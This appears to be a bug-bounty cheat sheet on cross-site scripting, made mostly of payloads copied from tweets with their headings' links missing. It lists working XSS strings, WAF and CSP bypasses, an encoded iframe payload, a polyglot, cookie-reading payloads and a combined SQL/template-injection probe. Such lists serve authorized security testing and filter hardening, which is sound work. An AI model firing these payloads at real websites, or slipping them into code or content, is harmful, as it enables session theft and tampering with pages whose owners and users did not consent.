Cross Site Scripting (XSS)

References for Cross Site Scripting Attacks

Blogs / Articles:

Upgrading Self XSS:

Tools / Cheatsheets:

if you google "" you can find where others are testing and maybe reveal some priv programs. :P

Twitter Threads:


<img ="=" title="><img src=1 onerror=alert(1)>"
<<img src=x onerror='prompt(1)'<
#BugBountyTip When you are dealing with XSS try to change the device or user-agent to Mobile you might get it work, in my case the homepage is different in devices the XSS is in username and the payload is Unicode UTF-16
XSS vector without >, \, 'alert', parentheses, quotes and spaces <svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//

thank you 
...WAF Bypass: "><brute+onbeforescriptexecute=a=alert,a(1%26%23x29> #security #XSS #KNOXSS

onffocusofocuscfocusufocuss="prompt(1)" - useful when waf replaces things like 'focus' to null, leaving us with onfocus="prompt(1)" -

One that should bypass some XSS filters, by 
<meter onmouseover="alert(1)"

Uppercase #XSS 
<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>

XSS bypass for a weak filter - riyaz walikar
<img src=x onerror="[]['constructor']['constructor']('ale'+'rt(0)')()">

var of "Function ('ale'+'rt(0)')()"

<a xml:base="javascript:alert(1)//" href="#"><circle r="100" />
//Firefox :) .- 

#XSS Tip Smiling face with sunglasses
I guess this one could solve all your HTMLi problems (regular, inline & JS block)

'"</Script><Html Onmouseover=(alert)(1) // -

This might lead to some fun XSS on status-code errors:
header("HTTP/1.0 999 <img src=x onerror=alert(1)>"); -

SomeTime It's Work!
#XSS #Payload


<iframe src=jaVaScrIpT:eval(atob('Y29uZmlybShkb2N1bWVudC5kb21haW4pOw=='))>

<div onmouseover="alert('XSS');">Hello :) 
^ [My favorite one - works like 80% of the time for me].
That's all for now that I'll share.
Enjoy the payloads too. ;)<--`<img/src=` onerror=alert("Friendly-XSS")> --!> 
<--`<img/src=` onerror=alert("Friendly-XSS")> --!>

To test XSS + SQLi + SSTI/CSTI with the same payload use : 


' ==> for Sql injection 

"><svg/onload=prompt(5);> ==> for XSS 

{{7*7}} ==> for SSTI/CSTI

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

CSP Bypass,  script-src 'self' data:

<script ?/src="data:+,\u0061lert%281%29">/</script>

When you find input field which allows " (quotes), try this payload:
"autofocus onfocus=alert(1)// -> Doesn't work

"type%3d"text"autofocus%20onfocus%3d"alert(1)" -> Works

Finally found my first bug on 
..I am just loving it. 
Bug: XSS through file upload.

Payload: */alert(1)</script><script>/*

There is so much to learn about HTML and JS hacks from this code:


This is inspired by 
 and will execute an 'alert(1)' without using parentheses, spaces or quotes!
 The Best XSS Polyglot! Police cars revolving lightPolice cars revolving light

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e


</a><a href=>Test</a>

\"><<img onerror=alert(49609) src>

"><<img onerror=alert(49609) src>




/<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>







Without ">" (XSS)

<svg onload='alert(1)'
<svg onload="alert(1)"
<svg onload=alert(1)//
<svg onload=alert(1)+
<svg onload=alert(1)<!--


<svg onload=alert(1)%20
<svg onload=alert(1)%0A
<svg onload=alert(1)%0C
<svg onload=alert(1)%0D
<svg onload=alert(1)%09


Bug : RXss 
Payload : "'`><\x00img src=xxx:x onerror=javascript:alert(1)>

Final payload:
<svg><animate onend=a\u006cert(1) dur=1s>

The final payload :
<a class="w-100" href=javascript:alert(document.cookie) // target=_self target="_blank">

Paylaod - \">'>\"><img/src/onerror=confirm(document.cookie)>

Cross mark "'><H1 on*>1
White heavy check mark "'><H1>1

Mi payload final fué:


<input/onfocus=prompt(document.domain) autofocus>

Some payloads that worked for me in popping up a stored XSS:-

1. <img src=`xx:xx`onerror=alert(1)>
2. <div/onmouseover='alert(1)'> style="x:">
3. \";alert('XSS');//
4. "autofocus/onfocus=alert(1)//
5. '-alert(1)-'

“><<img onerror=alert(document.cookie) src>

  • Did you know <a ping="url1 url2 url3 ..."> is a thing?Face screaming in fear

You can serve a XSS payload from a XML file: xss.xml: <?xml version="1.0" encoding="UTF-8"?> <html xmlns:html=""> <html:script>prompt(document.domain);</html:script> </html>


Last updated